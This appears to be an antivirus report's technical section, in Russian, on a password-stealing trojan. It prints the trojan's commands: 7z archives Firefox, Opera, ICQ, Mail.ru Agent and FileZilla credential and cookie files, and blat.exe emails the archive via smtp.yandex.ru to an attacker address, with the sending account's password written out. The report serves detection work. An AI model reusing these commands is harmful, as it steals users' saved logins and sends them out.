Техническая информация
- <SYSTEM32>\975.wan.san\blat.exe -body password's -to alien.xack@yandex.ru -attach %WINDIR%\pass.zip -install -server smtp.yandex.ru -port 587 -f shpionalien@yandex.ru -u shpionalien -pw 331953
- <SYSTEM32>\975.wan.san\7z.exe a -tzip -mx9 "%WINDIR%\pass.zip" "%APPDATA%\Mozilla\Firefox\Profiles\*.default\cookies.sqlite" a -tzip -mx9 "%WINDIR%\pass.zip" "%APPDATA%\Mozilla\Firefox\Profiles\*.default\signons.sqlite" a -tzip -mx9 "%WINDIR%\pass.zip" "%APPDATA%\ICQ\*\Owner.qdb" a -tzip -mx9 "%WINDIR%\pass.zip" "%APPDATA%\Mra\Base\mra.dbs" a -tzip -mx9 "%WINDIR%\pass.zip" "%APPDATA%\Opera\Opera\cookies4.dat" a -tzip -mx9 "%WINDIR%\pass.zip" "%APPDATA%\Opera\Opera\wand.dat" a -tzip -mx9 "%WINDIR%\pass.zip" "%APPDATA%\Mozilla\Firefox\Profiles\*.default\key3.db" a -tzip -mx9 "%WINDIR%\pass.zip" "%APPDATA%\FileZilla\filezilla.xml"
- <SYSTEM32>\taskkill.exe /f /im MAGENT.EXE
- <SYSTEM32>\cmd.exe /c ""%TEMP%\1.tmp\insstall2.bat" "
- <SYSTEM32>\975.wan.san\blat.dll
- <SYSTEM32>\975.wan.san\blat.lib
- <SYSTEM32>\975.wan.san\7z.exe
- %TEMP%\1.tmp\pass.zip.tmp
- %WINDIR%\pass.zip
- <SYSTEM32>\975.wan.san\blat.exe
- %TEMP%\1.tmp\blat.dll
- %TEMP%\1.tmp\insstall2.bat
- %TEMP%\1.tmp\blat.exe
- %TEMP%\1.tmp\7z.exe
- %TEMP%\1.tmp\blat.lib
- %TEMP%\1.tmp\insstall2.bat
- %WINDIR%\pass.zip
- '93.##8.134.11':587
- DNS ASK sm##.yandex.ru
- '<IP-адрес в локальной сети>':1034
- ClassName: '' WindowName: ''